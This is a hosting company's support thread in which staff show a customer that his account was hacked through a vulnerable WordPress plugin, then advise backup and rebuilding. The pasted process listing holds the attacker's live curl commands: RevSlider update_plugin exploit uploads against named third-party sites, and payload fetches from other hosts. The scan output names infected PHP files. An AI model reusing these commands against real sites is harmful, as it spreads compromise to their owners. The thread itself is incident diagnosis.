EraHost - Free domain & cheap host
Hosting companies ERA Host

Solutions for your inquiries

  hosting
<< Back       hosting
Question: CPU Usage is 92 / 100 %
Answer:

what did you run?


tural147 140559 0.0 0.0 129672 13340 ? S 14:39 0:00 cpaneld - serving 81.21. --llu=1422450509 --listen=3,4,5,6,7,8,9,10
tural147 141616 0.0 0.0 3164 75644 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10-A Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) --request GET http://rtlpalvelut.fi//index.php -o tmp/faxfqzulpvntykdyezebcvuln
tural147 141811 0.0 0.0 3164 75644 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10-A Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) --request GET http://www.stcatharinesstandard.ca//index.php -o tmp/ooxaklcyooaoykgpdbsycvuln
tural147 142268 0.0 0.0 3124 75644 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10-A Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) -H Cookie :\"\" -H Content_Type :form-data -F action=revslider_ajax_action -F client_action=update_plugin -F [email protected] --request POST http://www.lsbankchina.com//wp-admin/admin-ajax.php -o tmp/ismxkdbgxspxodgctihwwprev
tural147 142714 0.0 0.0 3204 75644 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10-A Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) -H Cookie :\"\" -H Content_Type :form-data -F action=revslider_ajax_action -F client_action=update_plugin -F [email protected] --request POST http://www.xn--aktieportefljen-gub.dk//wp-admin/admin-ajax.php -o tmp/yyvpstzvdeaxgrgkacgpwprev
tural147 142815 0.0 0.0 4076 544 ? S 14:39 0:00 sleep 1
tural147 142817 0.0 0.0 4076 544 ? S 14:39 0:00 sleep 1
tural147 142851 0.0 0.0 3184 75644 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10-A Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) http://karate.gibopaint.com/nyet.gif -o tmp/qiwbqnqxahmnkmthhdbcgck.txt
tural147 142858 0.0 0.0 4076 540 ? S 14:39 0:00 sleep 1
tural147 142871 0.0 0.0 3184 75644 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10-A Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) http://www.yamashinakensetsu.co.jp/nyet.gif -o tmp/smjofprupolupmcewmwjgck.txt
tural147 142875 0.0 0.0 3192 75644 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10 -o tmp/saizycndsijjdyuxnlwvresp.txt -H User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:IP) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729) -H Accept-Language: en-us,en;q=0.5 -H Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 -T nyet.gif http://www.semanariocentro.com.uy/
tural147 142897 0.0 0.0 0 0 ? Z 14:39 0:00 [cat] <defunct>
tural147 142900 0.0 0.0 4076 540 ? S 14:39 0:00 sleep 1
tural147 142901 0.0 0.0 4076 544 ? S 14:39 0:00 sleep 1
tural147 142918 0.0 0.0 0 0 ? R 14:39 0:00 [bash]
tural147 142922 0.0 0.0 0 0 ? Z 14:39 0:00 [cat] <defunct>
tural147 142924 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142925 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142935 0.0 0.0 4076 544 ? S 14:39 0:00 sleep 1
tural147 142937 0.0 0.0 17800 7040 ? R 14:39 0:00 bash apache2 fr,de,hr,cs,sl
tural147 142938 0.0 0.0 16788 5928 ? R 14:39 0:00 bash apache2 sr,sk,sv,th,ar
tural147 142939 0.0 0.0 4076 544 ? S 14:39 0:00 sleep 1
tural147 142945 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142946 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142948 0.0 0.0 0 0 ? Z 14:39 0:00 [cat] <defunct>
tural147 142950 0.0 0.0 0 0 ? Z 14:39 0:00 [cat] <defunct>
tural147 142955 0.0 0.0 17164 6340 ? R 14:39 0:00 bash apache2 en,et,fa,pl
tural147 142957 0.0 0.0 0 0 ? Z 14:39 0:00 [cut] <defunct>
tural147 142960 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142961 0.0 0.0 0 0 ? Z 14:39 0:00 [cat] <defunct>
tural147 142962 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142965 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142966 0.0 0.0 0 0 ? Z 14:39 0:00 [cut] <defunct>
tural147 142967 0.0 0.0 17164 5936 ? R 14:39 0:00 bash apache2 en,et,fa,pl
tural147 142968 0.0 0.0 20416 9292 ? R 14:39 0:00 bash apache2 ms,nb,pt_BR,pt_PT,ru
tural147 142969 0.0 0.0 16624 5400 ? R 14:39 0:00 bash apache2 sr,sk,sv,th,ar
tural147 142970 0.0 0.0 16624 5400 ? R 14:39 0:00 bash apache2 sr,sk,sv,th,ar
root 142972 0.0 0.0 103252 884 pts/0 S+ 14:39 0:00 grep tural147
tural147 776645 0.3 0.0 22000 11828 ? S Feb01 4:25 apache2 bash sr,sk,sv,th,ar
tural147 776669 0.3 0.0 22000 11840 ? S Feb01 4:24 apache2 bash tr,vi,uk,fi,
tural147 776732 0.3 0.0 22000 11828 ? S Feb01 4:24 bash apache2 da,nl,el,he,eg
tural147 776757 0.3 0.0 22000 11832 ? S Feb01 4:24 apache2 bash en,et,fa,pl
tural147 776794 0.3 0.0 22000 12092 ? S Feb01 4:23 apache2 bash fr,de,hr,cs,sl
tural147 776819 0.3 0.0 22000 12100 ? S Feb01 4:23 bash apache2 hu,is,id,it,es
tural147 776848 0.3 0.0 22000 11844 ? S Feb01 4:24 apache2 bash ja,ko,lv,lt,ro
tural147 776877 0.2 0.0 20416 10516 ? S Feb01 2:46 apache2 bash ms,nb,pt_BR,pt_PT,ru
tural147 777397 1.6 0.0 16624 6152 ? S Feb01 21:08 bash apache2 sr,sk,sv,th,ar
tural147 777398 1.7 0.0 16788 6340 ? S Feb01 22:28 bash apache2 sr,sk,sv,th,ar
tural147 777425 1.8 0.0 16916 6472 ? S Feb01 23:33 apache2 bash tr,vi,uk,fi,
tural147 777426 2.3 0.0 17312 6840 ? R Feb01 29:03 apache2 bash tr,vi,uk,fi,
tural147 777428 3.0 0.0 17948 7464 ? S Feb01 38:40 bash apache2 da,nl,el,he,eg
tural147 777429 3.2 0.0 18172 7664 ? S Feb01 41:12 bash apache2 da,nl,el,he,eg
tural147 777468 2.1 0.0 17352 6916 ? S Feb01 27:42 bash apache2 en,et,fa,pl
tural147 777469 1.9 0.0 17164 6684 ? R Feb01 24:16 bash apache2 en,et,fa,pl
tural147 777471 1.4 0.0 16492 6084 ? S Feb01 18:34 apache2 bash ja,ko,lv,lt,ro
tural147 777472 1.7 0.0 16744 6312 ? S Feb01 22:03 bash apache2 ja,ko,lv,lt,ro
tural147 777504 2.6 0.0 17800 7452 ? S Feb01 33:41 apache2 bash fr,de,hr,cs,sl
tural147 777505 2.4 0.0 17600 7284 ? R Feb01 31:07 apache2 bash fr,de,hr,cs,sl
tural147 777507 2.1 0.0 17284 6928 ? R Feb01 27:33 apache2 bash hu,is,id,it,es
tural147 777508 2.0 0.0 17100 6836 ? R Feb01 25:58 bash apache2 hu,is,id,it,es
tural147 777558 2.8 0.0 17880 7512 ? S Feb01 36:23 apache2 bash ms,nb,pt_BR,pt_PT,ru
tural147 989434 0.0 0.0 2432 23292 ? S 14:20 0:00 dovecot/imap
Question: da
Answer:

which means da?  what You have started? answer the question
Answer:


/home/tural147/public_html/compinter.net/wp-admin/css/search.php: PHP.Agent-20 FOUND
/home/tural147/public_html/baubaspa.com/wp-admin/css/colors/ocean/ms-settings.php: PHP.Agent-20 FOUND
/home/tural147/wp-conf.php: Trojan.PHP-43 FOUND
/home/tural147/public_html/concordgroup.az/wp-content/plugins/revslider/temp/update_extract/revslider.zip: PHP.Hide FOUND
/home/tural147/public_html/concordgroup.az/wp-content/plugins/revslider/temp/update_extract/revslider.zip: PHP.Hide FOUND
Question: spasiba
Answer:

you`re welcome. but you have a serious problem Your fault. you used a vulnerable plugin and your site has been hacked

http://1ps.ru/blog/sites/virus-soaksoak-atakuet-sajtyi-pod-upravleniem-cms-wordpress now you need to take measures to clean the site.

access to the site is only open to your ip.
Question: znacit teper krome menya nikto ne smojet voyti v sayt?
Answer:

while you are clear on hotwirecom - no. you have a serious problem, your sites hacked. better let nobody goes to your website than search engines will not even let you on the site because of viruses.
Answer:

the site yildiz.az do you have a solid virus
Question: bubaspa eto papka i v nacale pustaya bila pojalyusta kontroliruyte snova
Answer:

your sites are infected. the reason hacking - vulnerable plugin. take measures to clean the sites
Question: a vi mojete mne poslat zarajennie papki?
Answer:

no, we`re not sending the files. do you have ftp details you can download the files yourself.

 
Question: izvinite, ya vvedu imel linki papkinaprimer /home/tural147/public_html/compinter.net/wp-admin/css/search.php: PHP.Agent-20 FOUND
Answer:

 

all sites  and files to check, everything gave You a link to a description problemy

http://1ps.ru/blog/sites/virus-soaksoak-atakuet-sajtyi-pod-upravleniem-cms-wordpress/

 Either check each file or you can create sites again.

 
Question: .trash baubaspa.comcompinter.netne utadilit papki
Answer:

.trash is a system folder, you can`t touch her
Question: public_html/concordgroup.az/wp-content/plugins/revslider/temp/update_extractne udalit papki
Answer:

you want that would we recreate You account?
Question: ya imeyu vvedu ctobi vi poslali mne link zarejennix papok
Question: ya otpravil vam fayli kotorie ne udalennie
Answer:

how did you? what are the files? you all files of all sites checked?
Question: ya otpravil vam fayli kotorie ne maybe udalit public_html/concordgroup.az/wp-content/plugins/revslider/temp/update_extractprasu vas ctobi vi ix udalili = update_extract
Answer:

you udalagama ublic_html/concordgroup.az/wp-content/plugins/revslider/temp/update_extract ? but it will not solve the problem
Question: maybe a li sayt vernut v tu datu koqda sayt ne bil vzloman? normalno rabotal
Question: maybe a li sayt vernut v tu datu koqda sayt ne bil vzloman? normalno rabotal
Answer:

 

we do not know when it was hacked, you have infected files for 26 Jan, for this date we have no backups. in addition, if you return it will be hacked again.

we recommend You make a full backup, download it to your computer and then recreate all the sites again. Not using nepravelny plugins and themes from unofficial sources

 
Question: pojalyusta posledniy raz vi so svoimi antivirisami skaniruyte sayt i poslite nam zarejennie linki
Answer:

our anti-virus does not find these files , we have repeatedly scanned. additionally, the anti-virus software automatically scan the entire server every few days.
Question: obyasnite vi nam kak sdelat polniy back up?
Answer:

go into control panel menu - backup - a full backup. doing a full backup and then download the file to your computer


http://ded07.net/ help on how to use the panel
<< Back

Shared Hosting

VPS

For you

Our services

Dedicated Server

Account

Contact us

ICANN
В Контакте
facebook
google+
© 2006 - 2025 EraHost. All rights reserved